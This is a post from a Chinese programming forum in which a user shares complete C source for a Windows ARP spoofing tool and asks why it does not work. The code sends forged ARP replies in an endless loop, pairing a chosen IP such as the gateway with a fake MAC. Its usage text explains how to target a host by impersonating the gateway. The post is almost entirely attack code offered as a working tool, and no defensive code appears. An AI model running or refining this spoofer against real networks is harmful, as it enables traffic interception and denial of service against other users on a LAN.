标题:求助!我的arp攻击程序和防护程序可以编译但是不能实现功能
只看楼主
心乱买了表
Rank: 1
等 级:新手上路
帖 子:2
专家分:0
注 册:2015-5-28
 问题点数:0 回复次数:1 
求助!我的arp攻击程序和防护程序可以编译但是不能实现功能
#include <winsock2.h>
#include <stdio.h>
#include <Iphlpapi.h>
#include "packet32.h"

#pragma comment(lib, "packet.lib")
#pragma comment(lib, "WS2_32.lib")
#pragma comment(lib, "Iphlpapi.lib")

typedef struct tagAdapterInfo                //网卡信息结构
{
         char szDeviceName[128];               // 名字
         char szIPAddrStr[16];                   // IP
         char szHWAddrStr[18];                 // MAC
         DWORD dwIndex;                     // 编号         
         bool filled;//是否取得了网卡信息
}INFO_ADAPTER, *PINFO_ADAPTER;

INFO_ADAPTER infoAdapterList[10];

typedef struct _et_header     //以太网头部
{
     unsigned char   eh_dst[6];   //接收方的MAC
     unsigned char   eh_src[6];   //发送方的MAC
     unsigned short   eh_type;     //arp报文类型 0x0806
}ET_HEADER;

#pragma pack(1)
typedef struct _arp_header   //ARP头部
{
     unsigned short   arp_hdr; //硬件地址类型   以太网 0x0001
     unsigned short   arp_pro; //上层协议地址类型   IP协议 0x0800
     unsigned char   arp_hln; //MAC地址长度 0x06
     unsigned char   arp_pln;   //IP地质长度 0x04
     unsigned short   arp_opt;   //操作码   0x0001 请求 0x0002 应答
     unsigned char   arp_sha[6]; //发送方 MAC
     unsigned long   arp_spa;     //发送方   IP
     unsigned char   arp_tha[6]; //接收方 MAC
     unsigned long   arp_tpa;     //接收方 IP
}ARP_HEADER;
#pragma pack()


int GetLocalAdapterList()      //获取本机所有网卡
{
    char  tempChar;
    ULONG uListSize=1;
    PIP_ADAPTER_INFO pAdapter;  // 定义PIP_ADAPTER_INFO结构存储网卡信息
    int nAdapterIndex = 0;
   
    //获得网卡列表信息串长度
    DWORD         dwRet = GetAdaptersInfo((PIP_ADAPTER_INFO)&tempChar, &uListSize);
    printf("\r\nTry to get adapter list...\r\n");
    if (dwRet == ERROR_BUFFER_OVERFLOW)
    {
        PIP_ADAPTER_INFO pAdapterListBuffer = (PIP_ADAPTER_INFO) new (char[uListSize]);
        dwRet = GetAdaptersInfo(pAdapterListBuffer, &uListSize);
        if (dwRet == ERROR_SUCCESS)
        {
            pAdapter = pAdapterListBuffer;
            // 枚举网卡然后将相关条目添加到List中
            while (pAdapter)      
            {
                // 网卡名字
                char strTemp[128];
                lstrcpy(strTemp, "\\Device\\NPF_");                    
                lstrcat(strTemp,pAdapter->AdapterName);                         // 加上前缀              
                lstrcpy(infoAdapterList[nAdapterIndex].szDeviceName,strTemp);
                // IP
                lstrcpy(infoAdapterList[nAdapterIndex].szIPAddrStr,pAdapter->IpAddressList.IpAddress.String);
                // MAC
                sprintf(infoAdapterList[nAdapterIndex].szHWAddrStr, "%02x%02x%02x%02x%02x%02x",
                    pAdapter->Address[0],pAdapter->Address[1],pAdapter->Address[2],
                    pAdapter->Address[3],pAdapter->Address[4],pAdapter->Address[5]);
                // 网卡编号
                infoAdapterList[nAdapterIndex].dwIndex = pAdapter->Index;         
                pAdapter = pAdapter->Next;
                nAdapterIndex ++;
            }
            delete pAdapterListBuffer;
        }
        
        return nAdapterIndex;
    }
    return 0;
}




void StrToMac(char *str,unsigned char *mac) //将字符串转为16进制的Mac地址
{
         char *str1;
         int i;
         int low,high;
         char temp;
         for(i=0;i<6;i++)
         {
                 str1=str+1;
                 switch(*str)
                 {
                 case 'a' : high=10;break;
                 case 'b':   high=11;break;
                 case 'c':   high=12;break;
                 case 'd':   high=13;break;
                 case 'e':   high=14;break;
                 case 'f':   high=15;break;
                 default: temp=*str;
                         high=atoi(&temp);
                 }
                 switch(*str1)
                 {
                 case 'a' : low=10;break;
                 case 'b':   low=11;break;
                 case 'c':   low=12;break;
                 case 'd':   low=13;break;
                 case 'e':   low=14;break;
                 case 'f':   low=15;break;
                 default:temp=*str1;
                         low=atoi(&temp);
                 }
                 mac[i]=high*16+low;
                 str+=2;
         }
}

int about()
{
         printf("使用方法 : ArpAttack 被攻击方IP 发送方IP 假的MAC地址\r\n");
         printf("\n假设想攻击192.168.0.2 那么先取得网关IP地址 :192.168.0.1");
         printf("\n然后再 arpattack 192.168.0.2 192.168.0.1 222222222222(虚假MAC地址)");

         return 1;
}

int GetRemoteMac(unsigned char*remoteMac,char *remoteIP)//获取某IP真实mac地址 并输出
{
         //         remoteIP="10.200.203.179";
         WSADATA wsdata;
         ULONG remoteAddr=0,macAddrlen=6;
         unsigned char remoteMacTemp[6]={0};
        
         if(WSAStartup(MAKEWORD(2,1),&wsdata)!=0)
         {
                 printf("WSAStartup Error!\r\n");
                 return 0;
         }
         remoteAddr=inet_addr(remoteIP);
        if(SendARP(remoteAddr,(unsigned long)NULL,(PULONG)&remoteMacTemp,&macAddrlen)!=NO_ERROR)
         {
                 printf("Get Remote MAC failed!\r\n");
                 return 0;
         }
         memcpy(remoteMac,remoteMacTemp,6);
         printf("Remote IP:%s MAC:",remoteIP);
         for (int i=0;i<6;i++)
         {
                 printf("%.2x-",remoteMacTemp[i]);
         }
         printf("\r\n");
        
         return 1;
        
        
}



int main(int argc,char *argv[])
{
//    argv[0]="arpattack";
//    argv[1]="192.168.1.3";        //攻击目标IP
//    argv[2]="192.168.1.1";        //用于欺骗的IP地址,一般使用网关地址
//    argv[3]="222222222222";        //伪装Mac地址
//    argc=4;
    unsigned char fakemac[6]={0};
    int index;
    char tarIP[16];
    char srcIP[16];
    char cheatMac[13];
   
    printf("请输入攻击目标IP:");
    scanf("%s",tarIP);

    printf("请输入用于欺骗的IP地址(一般使用网关地址):");
    scanf("%s",srcIP);

    printf("请输入伪装Mac地址:");
    scanf("%s",cheatMac);
   
    LPADAPTER lpAdapter;
//    if (argc<4)
//    {
//        about();
//        return 0;
//    }
    unsigned char remoteMac[6]={0};
    if(!GetRemoteMac(remoteMac,tarIP))    //根据IP获得对应的Mac地址        
    {
        printf("GetRemoteMac Error!\r\n");
        return -1;
    }
    //         printf("%d\r\n",sizeof(ARP_HEADER));
    //         printf("%d\r\n",sizeof(ET_HEADER));
   
    int adaptercout = GetLocalAdapterList();
   
    StrToMac(cheatMac,fakemac);
   
    for(int ab=0;ab<adaptercout;ab++) //列举本机所有可用网卡
        printf("%d: %s: %s\n\n",ab+1,infoAdapterList[ab].szIPAddrStr,infoAdapterList[ab].szDeviceName);
   
   
    printf("请选择一块网卡:");
    while(TRUE)
    {
        scanf("%d",&index);
        if(index >0 && index <=adaptercout)
            break;
        else
            printf("请重新输入:");
    }
   
    lpAdapter=(LPADAPTER)PacketOpenAdapter((LPTSTR)infoAdapterList[index-1].szDeviceName);   //选择一块网卡发送包
    if(!lpAdapter||(lpAdapter->hFile==INVALID_HANDLE_VALUE))
    {
        printf("acketOepnAdapter Error!\r\n");
        return -1;
    }
   
   
   
   
    //---------------------------------------------------------------------------
    //构造一个arp包
    ET_HEADER et_header;
    ARP_HEADER arp_header;
    memcpy(et_header.eh_dst,remoteMac,6);    //被欺骗的目标Mac地址
    memcpy(et_header.eh_src,fakemac,6);        //用于欺骗的Mac地址
    et_header.eh_type=htons(0x0806);       //类型为0x0806表示这是ARP包
   
    arp_header.arp_hdr=htons(0x0001);        //硬件地址类型以太网地址
    arp_header.arp_pro=htons(0x0800);        //协议地址类型为IP协议
    arp_header.arp_hln=0x06;                //硬件地址长度为6
    arp_header.arp_pln=0x04;                //协议地址长度为4
    arp_header.arp_opt=htons(0x0002);        //标识为ARP应答
   
    arp_header.arp_spa=inet_addr(srcIP); //用于欺骗的ip
    memcpy(arp_header.arp_sha,et_header.eh_src,6);
    arp_header.arp_tpa=inet_addr(tarIP); //被欺骗的目标IP
    memcpy(arp_header.arp_tha,et_header.eh_dst,6);
   
    char buffer[512]={0};
    memcpy(buffer,&et_header,sizeof(ET_HEADER));
    memcpy(buffer+sizeof(ET_HEADER),&arp_header,sizeof(ARP_HEADER));
   
    //------------------------------------------------------------------------
   
    LPPACKET lpPacket;
   
    lpPacket=PacketAllocatePacket(); //分配内存
   
    PacketInitPacket(lpPacket,buffer,64);//初始化
   
    if(PacketSetNumWrites(lpAdapter,2)==FALSE) //设置发送次数
    {
        printf("攻击失败! \r\n");
        return 0;
        
    }
    while(TRUE)
    {
//        struct in_addr sAddr,tdAddr;
//        sAddr.S_un.S_addr=arp_header.arp_spa;
//        tdAddr.S_un.S_addr=arp_header.arp_tpa;
        
        printf("攻击 %s中\r\n",tarIP);
        if(PacketSendPacket(lpAdapter,lpPacket,TRUE)==FALSE) //发送包
        {
            printf("攻击失败!\r\n");
            break;
        }
        Sleep(2000);  //每发一个包后休息2s再发
    }
   
    PacketFreePacket(lpPacket);//释放
    PacketCloseAdapter(lpAdapter);   //关闭网卡
   
    return 1;        
}
搜索更多相关主题的帖子: comment include 网卡 信息 
2015-05-28 16:14
心乱买了表
Rank: 1
等 级:新手上路
帖 子:2
专家分:0
注 册:2015-5-28
得分:0 
这个问题困扰好久了,到处找资料找不到,万分请求各位大神帮忙看下。
2015-05-28 16:31



参与讨论请移步原网站贴子:https://bbs.bccn.net/thread-445893-1-1.html




关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.262133 second(s), 8 queries.
Copyright©2004-2025, BCCN.NET, All Rights Reserved